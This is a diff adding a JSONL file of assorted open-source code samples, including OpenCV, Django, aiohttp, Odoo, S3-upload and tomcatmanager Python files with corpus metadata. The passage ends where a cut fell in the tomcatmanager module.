diff --git "a/2497.jsonl" "b/2497.jsonl" new file mode 100644--- /dev/null +++ "b/2497.jsonl" @@ -0,0 +1,671 @@ +{"seq_id":"389535444","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread(\"farah\\Reading.jpg\")\n\nprint(img.shape)\n\n#using pithagors \nwidth, height = 565 ,819 \n\n#get them from windows paint\npts1 = np.float32([[72,272],[621,139],[312,1055],[960,881]])\npts2 = np.float32([[0,0],[width,0],[0,height],[width, height]])\nmatrix = cv2.getPerspectiveTransform(pts1,pts2)\nimgOutput = cv2.warpPerspective(img, matrix, (width, height))\n\n\ncv2.imshow(\"Image\" , img)\ncv2.imshow(\"Output\", imgOutput)\n\ncv2.waitKey(0)","sub_path":"chp5.py","file_name":"chp5.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"316316723","text":"from django.core.management.base import BaseCommand\nfrom django.utils import timezone\n\nfrom player.tenhou.models import TenhouNickname\n\n\ndef get_date_string():\n return timezone.now().strftime(\"%H:%M:%S\")\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n print(\"{0}: Start\".format(get_date_string()))\n\n tenhou_objects = TenhouNickname.objects.all()\n now = timezone.now().date()\n for tenhou_object in tenhou_objects:\n delta = now - tenhou_object.last_played_date\n if delta.days > 181:\n print(\"{} days {}\".format(tenhou_object.tenhou_username, delta.days))\n\n tenhou_object.is_active = False\n tenhou_object.save()\n\n # we disabled main account for the player\n # maybe there is another account to be main one\n if tenhou_object.is_main:\n other_objects = TenhouNickname.objects.filter(player=tenhou_object.player, is_active=True).first()\n\n if other_objects:\n other_objects.is_main = True\n other_objects.save()\n\n print(\"{0}: End\".format(get_date_string()))\n","sub_path":"server/player/tenhou/management/commands/mark_not_active_tenhou_accounts.py","file_name":"mark_not_active_tenhou_accounts.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"552695524","text":"__author__ = 'ldk'\nfrom django.conf.urls import patterns, include, url\nimport blog.views\n\nurlpatterns = patterns('',\n url(r'^login/', blog.views.my_view, name='login'),\n url(r'^register/', blog.views.register, name='register'),\n url(r'^blog/$', blog.views.archive, name='archive'),\n url(r'^$', blog.views.blog_list, name='blog_list'),\n url(r'^detail/$', blog.views.blog_detail, name='blog_detail'),\n\n )\n","sub_path":"blogsite/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"381818895","text":"# -*- coding: utf-8 -*-\n# need to upgrade the default Python version on Ubuntu 16.04\n# refer:\n# https://askubuntu.com/questions/865554/how-do-i-install-python-3-6-using-apt-get\n# https://aiohttp.readthedocs.io/en/stable/web_advanced.html#static-file-handling\nimport os\nimport logging\n\ntry:\n from aiohttp import web\nexcept ImportError:\n os.system('pip install aiohttp')\n from aiohttp import web\n\n\n# 启用日志\nlogging.basicConfig(level=logging.DEBUG)\n# 当前目录\nCWD = os.path.dirname(os.path.abspath(__file__))\n\n@web.middleware\nasync def mw_index(request, handler):\n '''中间件[将index.html作为默认文件]'''\n global CWD\n # 如果访问的是目录\n path = request.path[1:(-1 if request.path.endswith('/') else None):]\n lp = path.replace('/', os.sep)\n idxd = os.path.join(CWD, lp)\n if os.path.exists(idxd) and os.path.isdir(idxd):\n idxdf = os.path.join(idxd, 'index.html')\n if os.path.exists(idxdf):\n idxu = '/' + path + ('/' if len(path) > 0 else '') + 'index.html'\n return web.HTTPFound(idxu)\n resp = await handler(request)\n return resp\n\napp = web.Application(middlewares=[mw_index])\n\nstatic_route = web.static(\n '/',\n CWD,\n show_index=True)\napp.add_routes([static_route])\n\nif __name__ == '__main__':\n run_cfg = {\n 'host': '0.0.0.0',\n 'port': 9876\n }\n web.run_app(app, **run_cfg)\n","sub_path":"static-server.py","file_name":"static-server.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"38869130","text":"def set_enabled_vlans(api, name, vlans_enabled_list):\n updated = False\n to_add_vlans = []\n try:\n if (vlans_enabled_list is None):\n return updated\n current_vlans = get_vlan(api, name)\n if ('ALL' in vlans_enabled_list):\n if ((len(current_vlans['vlans']) > 0) or (current_vlans['state'] is 'STATE_ENABLED')):\n api.LocalLB.VirtualServer.set_vlan(virtual_servers=[name], vlans=[{\n 'state': 'STATE_DISABLED',\n 'vlans': [],\n }])\n updated = True\n else:\n if (current_vlans['state'] is 'STATE_DISABLED'):\n to_add_vlans = vlans_enabled_list\n else:\n for vlan in vlans_enabled_list:\n if (vlan not in current_vlans['vlans']):\n updated = True\n to_add_vlans = vlans_enabled_list\n break\n if updated:\n api.LocalLB.VirtualServer.set_vlan(virtual_servers=[name], vlans=[{\n 'state': 'STATE_ENABLED',\n 'vlans': [to_add_vlans],\n }])\n return updated\n except bigsuds.OperationFailed as e:\n raise Exception(('Error on setting enabled vlans : %s' % e))","sub_path":"Data Set/bug-fixing-3/1b2411c6d2e5ff203d69d4f357bc78b72ed87f14--bug.py","file_name":"1b2411c6d2e5ff203d69d4f357bc78b72ed87f14--bug.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"360610329","text":"import os\nimport re\nimport my_logging\nfrom distutils import dir_util\nfrom typing import Dict, List\nfrom shutil import copyfile\n\nfrom my_logging.log_context import log_context, add_log_context, remove_log_context\nfrom utils.helpers import read_file, save_to_file, prepend_to_lines\nfrom transaction.run import get_runner, run_function, list_to_str\n\n\nscript_dir = os.path.dirname(os.path.realpath(__file__))\ntemplate = os.path.join(script_dir, '..', 'app-template')\n\n\nclass ScenarioGenerator:\n\n def __init__(self, directory: str, filename: str, keys: Dict[str, int]):\n add_log_context('inputfileTx', filename)\n # locations\n self.directory = directory\n self.filename = filename\n self.output_directory = os.path.join(directory, 'compiled')\n self.code_file = os.path.join(directory, filename)\n\n # copy template to current directory\n self.scenario_directory = os.path.join(self.directory, 'scenario')\n dir_util.copy_tree(template, self.scenario_directory)\n self.scenario_js_file = os.path.join(self.scenario_directory, 'scenario.js')\n self.scenario_js = read_file(self.scenario_js_file)\n self.deploy_js_file = os.path.join(self.scenario_directory, 'migrations', '2_deploy_contracts.js')\n self.deploy_js = read_file(self.deploy_js_file)\n\n # copy contracts\n for filename in os.listdir(self.output_directory):\n if filename.endswith('.sol'):\n source = os.path.join(self.output_directory, filename)\n target = os.path.join(self.scenario_directory, 'contracts', filename)\n copyfile(source, target)\n\n # prepare logging\n log_file = my_logging.get_log_file(None, self.scenario_directory, 'transactions', False)\n my_logging.prepare_logger(log_file)\n\n # prepare runner\n self.r = get_runner(self.output_directory, self.code(), self.name(), keys)\n\n # others\n self.transactions = []\n self.set_contract_name()\n self.set_accounts(keys)\n self.set_pk_announce(keys)\n self.set_contract_fetch()\n self.set_verifiers()\n\n self.n_calls = 0\n\n def code(self):\n return read_file(self.code_file)\n\n def name(self):\n c = self.code()\n m = re.search('contract ([^ {]*)', c)\n return m.group(1)\n\n def set_contract_name(self):\n contract_name = f'helpers.contract_name = \"{self.name()}\";'\n self.scenario_js = self.scenario_js.replace('$CONTRACT_NAME', contract_name)\n self.deploy_js = self.deploy_js.replace('$CONTRACT_NAME', contract_name)\n\n def set_contract_fetch(self):\n contract_fetch = f'var contract = artifacts.require(\"{self.name()}\");'\n self.scenario_js = self.scenario_js.replace('$CONTRACT_FETCH', contract_fetch)\n\n def set_pk_announce(self, keys: Dict[str, int]):\n lines = []\n for k, v in keys.items():\n lines += [f'await helpers.tx(genPublicKeyInfrastructure, \"announcePk\", [{v}], {k});']\n lines = '\\n'.join(lines)\n lines = prepend_to_lines(lines, '\\t')\n self.scenario_js = self.scenario_js.replace('$PK_ANNOUNCE', lines)\n\n def set_accounts(self, keys: Dict[str, int]):\n lines = []\n for i, k in enumerate(keys.keys()):\n lines += [f'var {k} = accounts[{i}];']\n lines = '\\n'.join(lines)\n lines = prepend_to_lines(lines, '\\t')\n self.scenario_js = self.scenario_js.replace('$ACCOUNTS', lines)\n\n def set_verifiers(self):\n verifiers_fetch = []\n verifiers_deploy = []\n verifiers_wait = []\n for c in self.r.compiler_information.used_contracts:\n if 'PublicKeyInfrastructure' not in c.contract_name:\n verifiers_fetch += [f'var {c.state_variable_name} = artifacts.require(\"{c.contract_name}\");']\n verifiers_deploy += [f'await deployer.link(pairing, {c.state_variable_name});\\nawait deployer.link(bn256g2, {c.state_variable_name});\\nawait helpers.deploy(web3, deployer, {c.state_variable_name}, [], accounts[0]);']\n verifiers_wait += [f'{c.state_variable_name} = await {c.state_variable_name}.deployed();']\n verifiers_fetch = prepend_to_lines('\\n'.join(verifiers_fetch), '\\t')\n verifiers_deploy = prepend_to_lines('\\n'.join(verifiers_deploy), '\\t')\n verifiers_wait = prepend_to_lines('\\n'.join(verifiers_wait), '\\t')\n self.deploy_js = self.deploy_js \\\n .replace('$VERIFIERS_FETCH', verifiers_fetch) \\\n .replace('$VERIFIERS_DEPLOY', verifiers_deploy)\n self.scenario_js = self.scenario_js.replace('$VERIFIERS_FETCH', verifiers_fetch)\n self.scenario_js = self.scenario_js.replace('$VERIFIERS_WAIT', verifiers_wait)\n\n def run_function(self, function_name: str, me: str, args: List):\n with log_context('nCalls', self.n_calls):\n self.n_calls += 1\n with log_context('runFunction', function_name):\n real_args = run_function(self.r, function_name, me, args)\n\n args_str = list_to_str(args)\n real_args_str = list_to_str(real_args)\n\n if function_name == 'constructor':\n t = f'// {function_name}({args_str})\\nargs = [{real_args_str}];\\nlet contract_instance = await helpers.deploy_x(web3, contract, args, {me});'\n t = prepend_to_lines(t, '\\t')\n self.scenario_js = self.scenario_js.replace('$CONTRACT_DEPLOY', t)\n else:\n t = f'// {function_name}({args_str})\\nargs = [{real_args_str}];\\nawait helpers.tx(contract_instance, \"{function_name}\", args, {me});'\n t = prepend_to_lines(t, '\\t')\n self.transactions += [t]\n\n def finalize(self):\n transactions = '\\n\\n'.join(self.transactions)\n self.scenario_js = self.scenario_js.replace('$TRANSACTIONS', transactions)\n\n save_to_file(None, self.scenario_js_file, self.scenario_js)\n save_to_file(None, self.deploy_js_file, self.deploy_js)\n remove_log_context('inputfileTx')\n","sub_path":"eval-ccs2019/examples/scenarios.py","file_name":"scenarios.py","file_ext":"py","file_size_in_byte":6092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"50561721","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# This module uses OpenERP, Open Source Management Solution Framework.\n# Copyright (C) 2014-Today BrowseInfo ()\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see \n#\n##############################################################################\nfrom odoo import api, fields, models, _\nfrom odoo.tools.translate import _\nimport odoo.addons.decimal_precision as dp\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import datetime\nfrom odoo.exceptions import UserError\nfrom odoo.tools import float_is_zero, float_compare, DEFAULT_SERVER_DATETIME_FORMAT\nfrom odoo import SUPERUSER_ID\n\n\nclass Sale(models.Model):\n _inherit = \"sale.order\"\n \n '''@api.model\n def default_get(self, fields):\n res = super(Sale, self).default_get(fields)\n if self._context.get('active_id'):\n active_id = self._context.get('active_id')\n crm_brw = self.env['crm.lead'].browse(active_id)\n warehouse_search = self.env['stock.warehouse'].search([('company_id','=',crm_brw.company_id.id)])\n if self._context.get('default_opportunity_id'):\n res['compnay_id'] = crm_brw.company_id.id\n res['warehouse_id'] = warehouse_search.id and warehouse_search[0].id or False\n return res'''\n \n\n @api.onchange('company_id')\n def onchange_company_id(self):\n if self.company_id:\n search_warehouse = self.env['stock.warehouse'].search([('company_id','=',self.company_id.id)])\n self.warehouse_id = search_warehouse and search_warehouse[0].id or False\n \n @api.multi\n def _create_invoice(self, order, so_line, amount):\n inv_obj = self.env['account.invoice']\n ir_property_obj = self.env['ir.property']\n\n account_id = False\n if self.product_id.id:\n account_id = self.product_id.property_account_income_id.id\n if not account_id:\n prop = ir_property_obj.get('property_account_income_categ_id', 'product.category')\n prop_id = prop and prop.id or False\n account_id = order.fiscal_position_id.map_account(prop_id)\n if not account_id:\n raise UserError(\n _('There is no income account defined for this product: \"%s\". You may have to install a chart of account from Accounting app, settings menu.') % \\\n (self.product_id.name,))\n\n if self.amount <= 0.00:\n raise UserError(_('The value of the down payment amount must be positive.'))\n if self.advance_payment_method == 'percentage':\n amount = order.amount_untaxed * self.amount / 100\n name = _(\"Down payment of %s%%\") % (self.amount,)\n else:\n amount = self.amount\n name = _('Down Payment')\n invoice = inv_obj.create({\n 'name': order.client_order_ref or order.name,\n 'origin': order.name,\n 'type': 'out_invoice',\n 'reference': False,\n 'account_id': order.partner_id.property_account_receivable_id.id,\n 'partner_id': order.partner_invoice_id.id,\n 'invoice_line_ids': [(0, 0, {\n 'name': name,\n 'origin': order.name,\n 'account_id': account_id,\n 'price_unit': amount,\n 'quantity': 1.0,\n 'discount': 0.0,\n 'uom_id': self.product_id.uom_id.id,\n 'product_id': self.product_id.id,\n 'sale_line_ids': [(6, 0, [so_line.id])],\n 'invoice_line_tax_ids': [(6, 0, [x.id for x in self.product_id.taxes_id])],\n 'account_analytic_id': order.project_id.id or False,\n 'company_id': self.company_id.id,\n })],\n 'currency_id': order.pricelist_id.currency_id.id,\n 'payment_term_id': order.payment_term_id.id,\n 'fiscal_position_id': order.fiscal_position_id.id or order.partner_id.property_account_position_id.id,\n 'team_id': order.team_id.id,\n })\n invoice.compute_taxes()\n return invoice\n \n \n @api.multi\n def _prepare_invoice(self ):\n \"\"\"\n Prepare the dict of values to create the new invoice for a sales order. This method may be\n overridden to implement custom invoice generation (making sure to call super() to establish\n a clean extension chain).\n \"\"\"\n property_obj = self.env['ir.property']\n field_obj = self.env['ir.model.fields']\n self.ensure_one()\n journal_ids = self.env['account.journal'].search(\n [('type', '=', 'sale'), ('company_id', '=', self.company_id.id)])\n if not journal_ids:\n raise UserError(_('There is no Account for %s Company. You may have to set a chart of account from Accounting app, settings menu.') % \\\n (self.company_id.name,))\n field_ids = field_obj.search([('field_description', '=', 'Account Receivable')])\n if field_ids:\n for field in field_ids:\n property_id = property_obj.search([('fields_id', '=', field.id), ('company_id', '=', self.company_id.id)])\n if property_id:\n acc_ref = property_obj.browse(property_id[0].id).value_reference\n account_id = acc_ref and acc_ref.split(',') and acc_ref.split(',')[1]\n account_id = int(account_id)\n else:\n raise UserError( _('There is no Account for %s Company. You may have to set a chart of account from Accounting app, settings menu.') % \\\n (self.company_id.name,))\n# bank_account_id = False\n# if self.partner_id:\n# if self.partner_id.company_id:\n# company_obj = self.env['res.company'].browse(self.partner_id.company_id.id)\n# if company_obj.bank_ids:\n# bank_account_id = company_obj.bank_ids[0].id\n invoice_vals = {\n 'name': self.client_order_ref or '',\n 'origin': self.name,\n 'type': 'out_invoice',\n 'reference': self.client_order_ref or self.name,\n 'account_id': account_id ,\n 'partner_id': self.partner_invoice_id.id,\n 'journal_id': journal_ids[0].id,\n 'currency_id': self.pricelist_id.currency_id.id,\n 'comment': self.note,\n 'payment_term_id': self.payment_term_id.id,\n 'fiscal_position_id': self.fiscal_position_id.id or self.partner_invoice_id.property_account_position_id.id,\n 'company_id': self.company_id.id,\n 'user_id': self.user_id and self.user_id.id,\n 'team_id': self.team_id.id,\n # 'partner_bank_id': bank_account_id or False,\n }\n return invoice_vals\n \nclass sale_order_line(models.Model):\n _inherit = 'sale.order.line'\n \n @api.multi\n def _compute_tax_id(self):\n for line in self:\n fpos = line.order_id.fiscal_position_id or line.order_id.partner_id.property_account_position_id\n if fpos:\n # The superuser is used by website_sale in order to create a sale order. We need to make\n # sure we only select the taxes related to the company of the partner. This should only\n # apply if the partner is linked to a company.\n if self.env.uid == SUPERUSER_ID and line.order_id.company_id:\n taxes = fpos.map_tax(line.product_id.taxes_id).filtered(lambda r: r.company_id == line.order_id.company_id)\n else:\n taxes = fpos.map_tax(line.product_id.taxes_id).filtered(lambda r: r.company_id == line.order_id.company_id)\n line.tax_id = taxes\n else:\n line.tax_id = line.product_id.taxes_id.filtered(lambda r: r.company_id == line.order_id.company_id) if line.product_id.taxes_id else False\n \n @api.multi\n @api.onchange('product_id')\n def product_id_change(self):\n if not self.product_id:\n return {'domain': {'product_uom': []}}\n\n vals = {}\n domain = {'product_uom': [('category_id', '=', self.product_id.uom_id.category_id.id)]}\n if not (self.product_uom and (self.product_id.uom_id.category_id.id == self.product_uom.category_id.id)):\n vals['product_uom'] = self.product_id.uom_id\n\n product = self.product_id.with_context(\n lang=self.order_id.partner_id.lang,\n partner=self.order_id.partner_id.id,\n quantity=self.product_uom_qty,\n date=self.order_id.date_order,\n pricelist=self.order_id.pricelist_id.id,\n uom=self.product_uom.id\n )\n\n name = product.name_get()[0][1]\n if product.description_sale:\n name += '\\n' + product.description_sale\n vals['name'] = name\n self._compute_tax_id()\n\n if self.order_id.pricelist_id and self.order_id.partner_id:\n vals['price_unit'] = self.env['account.tax']._fix_tax_included_price(product.price, product.taxes_id, self.tax_id)\n self.update(vals)\n return {'domain': domain}\n \n \n @api.multi\n def _prepare_invoice_line(self, qty ):\n \"\"\"\n Prepare the dict of values to create the new invoice line for a sales order line.\n\n :param qty: float quantity to invoice\n \"\"\"\n self.ensure_one()\n res = {}\n property_obj = self.env['ir.property']\n field_obj = self.env['ir.model.fields']\n if self.invoice_status != 'invoiced':\n # if not account_id:\n if self.product_id:\n field_id = field_obj.search( [('field_description', '=', 'Income Account'), ('name', '=', 'property_account_income_categ_id')])\n if field_id and self._context:\n property_id = property_obj.search([('fields_id', '=', field_id[0].id), ('company_id', '=', self.order_id.company_id.id)])\n else:\n property_id = False\n if property_id:\n acc_ref = property_obj.browse( property_id[0].id).value_reference\n account_id = acc_ref and acc_ref.split(',') and acc_ref.split(',')[1]\n account_id = int(account_id)\n else:\n account_id = False\n \n if not account_id:\n field_id = field_obj.search([('field_description', '=', 'Income Account'), ('name', '=', 'property_account_income_categ_id')])\n if field_id and self._context:\n property_id = property_obj.search( [('fields_id', '=', field_id[0].id), ('company_id', '=', self.order_id.company_id.id)])\n else:\n property_id = False\n if property_id:\n acc_ref = property_obj.browse(property_id[0]).value_reference\n account_id = acc_ref and acc_ref.split(',') and acc_ref.split(',')[1]\n account_id = int(account_id)\n else:\n account_id = False\n if not account_id:\n raise UserError(_('Error!'),\n _('Please define income account for this product: \"%s\" (id:%d).') % \\\n (self.product_id.name, self.product_id.id,))\n else:\n prop = self.pool.get('ir.property').get(\n 'property_account_income_categ_id', 'product.category')\n account_id = prop and prop.id or False\n# uosqty = self._get_line_qty(self)\n# pu = 0.0\n# if uosqty:\n# pu = round(self.price_unit * self.product_uom_qty / uosqty,\n# self.pool.get('decimal.precision').precision_get('Product Price'))\n# fpos = self.order_id.fiscal_position or False\n# account_id = self.pool.get('account.fiscal.position').map_account(fpos, account_id)\n if not account_id:\n raise UserError(_('Error!'),\n _('There is no Fiscal Position defined or Income category account defined for default properties of Product categories.'))\n res = {\n 'name': self.name,\n 'sequence': self.sequence,\n 'origin': self.order_id.name,\n 'account_id': account_id or False,\n 'price_unit': self.price_unit,\n 'quantity': qty,\n 'discount': self.discount,\n 'uom_id': self.product_uom.id,\n 'product_id': self.product_id.id or False,\n 'invoice_line_tax_ids': [(6, 0, self.tax_id.ids)],\n 'account_analytic_id': self.order_id.analytic_account_id.id,\n }\n return res\n \n \n @api.multi\n def invoice_line_create(self, invoice_id, qty):\n \"\"\"\n Create an invoice line. The quantity to invoice can be positive (invoice) or negative\n (refund).\n\n :param invoice_id: integer\n :param qty: float quantity to invoice\n \"\"\"\n precision = self.env['decimal.precision'].precision_get('Product Unit of Measure')\n for line in self:\n ctx = dict(self._context, lang=self.order_id.partner_id.lang)\n ctx['sale_id'] = line.order_id \n if not float_is_zero(qty, precision_digits=precision):\n vals = line._prepare_invoice_line(qty=qty)\n vals.update({'invoice_id': invoice_id, 'sale_line_ids': [(6, 0, [line.id])]})\n self.env['account.invoice.line'].create(vals) \n \nclass stock_move(models.Model):\n _inherit = 'stock.move'\n \n sale_line_id = fields.Many2one('sale.order.line', 'Sale Order Line')\n\n\n def attribute_price(self,cr, uid, move, context=None):\n \"\"\"\n Attribute price to move, important in inter-company moves or receipts with only one partner\n \"\"\"\n if not move.price_unit:\n price = move.sale_line_id and move.sale_line_id.price_unit or 0.0\n self.write(cr, uid,[move.id], {'price_unit': price}) \n \n\n# class ProcurementOrder(models.Model):\n# _inherit = \"procurement.order\"\n \n# def _run_move_create(self,cr, uid ,procurement, context=None):\n# ''' Returns a dictionary of values that will be used to create a stock move from a procurement.\n# This function assumes that the given procurement has a rule (action == 'move') set on it.\n\n# :param procurement: browse record\n# :rtype: dictionary\n# '''\n \n# if procurement.product_id.is_pack==True:\n# return {}\n# newdate = (datetime.strptime(procurement.date_planned, '%Y-%m-%d %H:%M:%S') - relativedelta(days=procurement.rule_id.delay or 0)).strftime('%Y-%m-%d %H:%M:%S')\n# group_id = False\n# if procurement.rule_id.group_propagation_option == 'propagate':\n# group_id = procurement.group_id and procurement.group_id.id or False\n# elif procurement.rule_id.group_propagation_option == 'fixed':\n# group_id = procurement.rule_id.group_id and procurement.rule_id.group_id.id or False\n# #it is possible that we've already got some move done, so check for the done qty and create\n# #a new move with the correct qty\n# already_done_qty = 0\n# for move in procurement.move_ids:\n# already_done_qty += move.product_uom_qty if move.state == 'done' else 0\n# qty_left = max(procurement.product_qty - already_done_qty, 0)\n# vals = {\n# 'name': procurement.name,\n# #'company_id': procurement.rule_id.company_id.id or procurement.rule_id.location_src_id.company_id.id or procurement.rule_id.location_id.company_id.id or procurement.company_id.id,\n# 'company_id': procurement.company_id.id or procurement.rule_id.company_id.id or procurement.rule_id.location_src_id.company_id.id or procurement.rule_id.location_id.company_id.id,\n# 'product_id': procurement.product_id.id,\n# 'product_uom': procurement.product_uom.id,\n# 'product_uom_qty': qty_left,\n# 'partner_id': procurement.rule_id.partner_address_id.id or (procurement.group_id and procurement.group_id.partner_id.id) or False,\n# 'location_id': procurement.rule_id.location_src_id.id,\n# 'location_dest_id': procurement.location_id.id,\n# 'move_dest_id': procurement.move_dest_id and procurement.move_dest_id.id or False,\n# 'procurement_id': procurement.id,\n# 'rule_id': procurement.rule_id.id,\n# 'procure_method': procurement.rule_id.procure_method,\n# 'origin': procurement.origin,\n# 'picking_type_id': procurement.rule_id.picking_type_id.id,\n# 'group_id': group_id,\n# 'route_ids': [(4, x.id) for x in procurement.route_ids],\n# 'warehouse_id': procurement.rule_id.propagate_warehouse_id.id or procurement.rule_id.warehouse_id.id,\n# 'date': newdate,\n# 'date_expected': newdate,\n# 'propagate': procurement.rule_id.propagate,\n# 'priority': procurement.priority,\n# 'sale_line_id': procurement.sale_line_id and procurement.sale_line_id.id,\n# }\n# return vals\n \n# def _run(self, cr, uid, procurement, context=None):\n \n# if procurement.rule_id and procurement.rule_id.action == 'move':\n# if not procurement.rule_id.location_src_id:\n# self.message_post(cr, uid, [procurement.id], body=_('No source location defined!'), context=context)\n# return False\n# move_obj = self.pool.get('stock.move')\n \n# move_dict = self._run_move_create(cr, uid, procurement, context=context)\n \n# #create the move as SUPERUSER because the current user may not have the rights to do it (mto product launched by a sale for example)\n# if not move_dict:\n# return True\n# move_obj.create(cr, SUPERUSER_ID, move_dict, context=context)\n# return True\n# return super(procurement_order, self)._run(cr, uid, procurement, context=context)\n \n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"sasmar_user_preference/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":19099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"463602122","text":"__author__ = 'Serg'\nfrom core import TImporter\nfrom core import TSimplexTable\nimport re\n\nclass LatexImporter(TImporter.TImporter):\n def parseText(self):\n text = self.importText.lower().replace(' ','').replace('\\n','')#всё в нижний регистр и удалить пробелы\n equations = text.split('\\\\\\\\')\n targetFunctionId = None\n rExtractMembers = re.compile('[\\+-]?[0-9]*[a-zA-Z][_]{[0-9]*}', re.UNICODE)\n rExtractMemberParts = re.compile('([\\+-]?)([0-9]*)([a-zA-Z]{1})_{([0-9]*|([0-9]*[.]*[0-9]*))}', re.UNICODE)\n rExtractConstraints = re.compile('(\\\\\\\\geq|=|\\\\\\\\leq|>|<)([0-9]*)', re.UNICODE)\n rExtractTargetFunctionType = re.compile('(\\\\\\\\rightarrow)(\\\\\\\\max|\\\\\\\\min)',re.UNICODE)\n i = 0\n system = []\n\n #определяет размерность матрицы\n matrixWidth = 0\n matrixHeight = 0\n for eq in equations:\n if len(eq.strip())==0:\n continue\n if eq.find('l=')<0:\n matrixHeight+=1\n eqMembers = rExtractMembers.findall(eq)\n for member in eqMembers:\n memberParts = rExtractMemberParts.findall(member)[0]\n\n if int(memberParts[3])>matrixWidth:\n matrixWidth = int(memberParts[3])\n\n #дальнейший разбор членов\n for eq in equations:\n if eq.find('l=')>=0:\n targetFunctionId = i\n eq.replace('l=','')\n eqMembers = rExtractMembers.findall(eq)\n #will extract signs and constraint values\n if targetFunctionId==i:\n constraintType = rExtractTargetFunctionType.findall(eq)[0][1]\n #print('L constraint type: '+constraintType)\n constraintType = constraintType=='\\\\max'\n #will extract member coefficients\n coefficients = [0 for i in range(matrixWidth)]\n\n for member in eqMembers:\n memberParts = rExtractMemberParts.findall(member)[0]\n if memberParts[1]=='':\n num = 1\n else:\n num = float(memberParts[1])\n if memberParts[0]=='-':\n num=num*(-1)\n coefficients.__setitem__(int(memberParts[3])-1,num)\n if targetFunctionId!=i:\n constraint = rExtractConstraints.findall(eq)[0]\n system.append((coefficients,self.translateLatexToConstraint(constraint[0]),float(constraint[1])))\n else:\n Z = coefficients\n\n i += 1\n return [system,Z,constraintType]\n\n def translateLatexToConstraint(self, param):\n if param==\"\\\\leq\" :\n return \"<=\"\n if param==\"\\\\geq\":\n return \">=\"\n return param\n\n","sub_path":"core/latexImporter.py","file_name":"latexImporter.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"421076029","text":"import boto3\n\ndef upload():\n\tpath = './divided_by_20_keras_model/by_one/'\n\t#path = './divided_by_20/'\n\ts3 = boto3.resource('s3')\n\tbucket = s3.Bucket('takenaka')\n\tbucket_path = 'model_STD_1_723/'\n\t#bucket_path = 'processed_data_STD/'\n\ttry:\n\t\tfor i in range(1,724):\n\t\t\tfile_stream = 'model_case_%d.h5' % i\n\t\t\t#file_stream = 'datas_%03d_%03d.npy' % (i, i)\n\t\t\tbucket.upload_file(path +file_stream, bucket_path + file_stream)\n\t\t\tprint(path+file_stream)\n\texcept:\n\t\timport traceback\n\t\ttraceback.print_exc()\nif __name__ == '__main__':\n\tupload()\n","sub_path":"python_shell_s3_upload.py","file_name":"python_shell_s3_upload.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"235469099","text":"#\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2007 Jared Crapo\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n\"\"\"\ntomcatmanager.models\n--------------------\n\nThis module contains the data objects created by and used by tomcatmanager.\n\"\"\"\n\nfrom typing import TypeVar\n\nfrom attrdict import AttrDict\nimport requests\n\nimport tomcatmanager as tm\n\n\nclass TomcatError(Exception):\n \"\"\"\n Raised when the Tomcat Server responds with an error.\n \"\"\"\n\n###\n#\n# build status codes\n#\n###\nSTATUS_CODES = {\n # 'sent from tomcat': 'friendly name'\n 'OK': 'ok',\n 'FAIL': 'fail',\n # if we can't find tomcat, we invent a NOTFOUND value\n 'NOTFOUND': 'notfound',\n}\n# pylint: disable=invalid-name\nstatus_codes = AttrDict()\nfor _code, _title in STATUS_CODES.items():\n status_codes[_title] = _code\n\n\n# pylint: disable=too-many-instance-attributes\nclass TomcatManagerResponse:\n \"\"\"\n Returned as the response for :class:`.TomcatManager` commands.\n\n After running a command, it's a good idea to check and make sure that\n the command completed succesfully before relying on the results::\n\n >>> import tomcatmanager as tm\n >>> tomcat = 